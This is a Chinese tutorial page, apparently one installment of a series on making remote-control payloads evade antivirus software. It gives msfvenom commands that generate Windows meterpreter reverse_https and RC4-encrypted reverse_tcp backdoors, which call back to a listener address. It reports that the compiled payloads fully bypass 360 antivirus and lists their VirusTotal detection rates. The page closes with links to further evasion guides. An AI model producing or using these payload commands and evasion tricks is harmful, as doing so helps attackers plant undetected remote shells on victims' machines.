主页 > 网络知识 > 远控免杀从入门到实践(一):基础篇(7)

远控免杀从入门到实践(一):基础篇(7)

 

image(9).png

 

7.8 使用reverse_https(VT免杀率29/70)

操作便利★★

免杀效果★★★

推荐指数★★★

详细文章链接:https://mp.weixin.qq.com/s/HsIqUKl7j1WJ4yyYzXdPZg

主要是参考Green_m的文章:https://www.freebuf.com/sectool/118714.html,可以一定程度的避开杀软的流量检测。

使用msfvenom生成payload

msfvenom -p windows/meterpreter/reverse_https lhost=10.211.55.2 lport=3333 -f exe -o payload1.exe

在VC中编译后执行,360全免杀

 

image(10).png

image(11).png

 

virustotal.com中29/70个报毒

 

image(12).png

 

7.9 使用reverse_tcp_rc4(VT免杀率33/70)

操作便利★★

免杀效果★★★

推荐指数★★★

详细文章链接:https://mp.weixin.qq.com/s/HsIqUKl7j1WJ4yyYzXdPZg

和上面的方法一样,使用reverse_tcp_rc4也有同样的效果,而且不用设置stageencoder选项,更稳定更方便。

msfvenom -p windows/meterpreter/reverse_tcp_rc4 lhost=10.211.55.2 lport=2223 rc4password=tidesec -f c

利用rc4对传输的数据进行加密,密钥在生成时指定,在监听的服务端设置相同的密钥。

在VC中编译后执行,360全免杀,但是一会儿之后就又被查杀了。

virustotal.com中33/70个报毒

 

image(13).png

 

八、参考

很多内容参考了wiki百科和freebuf上Green_m和Anhkgg两位大佬的文章,在此表示感谢!想深入了解的可在访问下面链接。

免杀技术有一套:https://anhkgg.com/aanti-virus/

Meterpreter免杀及对抗分析:https://www.freebuf.com/sectool/157122.html

免杀艺术:https://www.4hou.com/technology/3853.html

Meterpreter免杀技巧分享:https://www.freebuf.com/sectool/118714.html

msf_wiki: https://github.com/rapid7/metasploit-framework/wiki

Create a wrapper for metasm’s C compiling function:https://github.com/rapid7/metasploit-framework/pull/10007

How to decode Base64 with Metasploit Framework Compiler: https://github.com/rapid7/metasploit-framework/wiki/How-to-decode-Base64-with-Metasploit-Framework-Compiler

使用msf编码器避开杀毒软件的检测:https://www.freebuf.com/column/216599.html

msf多重编码:https://blog.csdn.net/wyf12138/article/details/79825833

Msfvenom学习总结:

msfvenom生成后门的免杀测试:%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8%E7%9A%84%E5%85%8D%E6%9D%80%E6%B5%8B%E8%AF%95/

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!

您可能还会对这些文章感兴趣!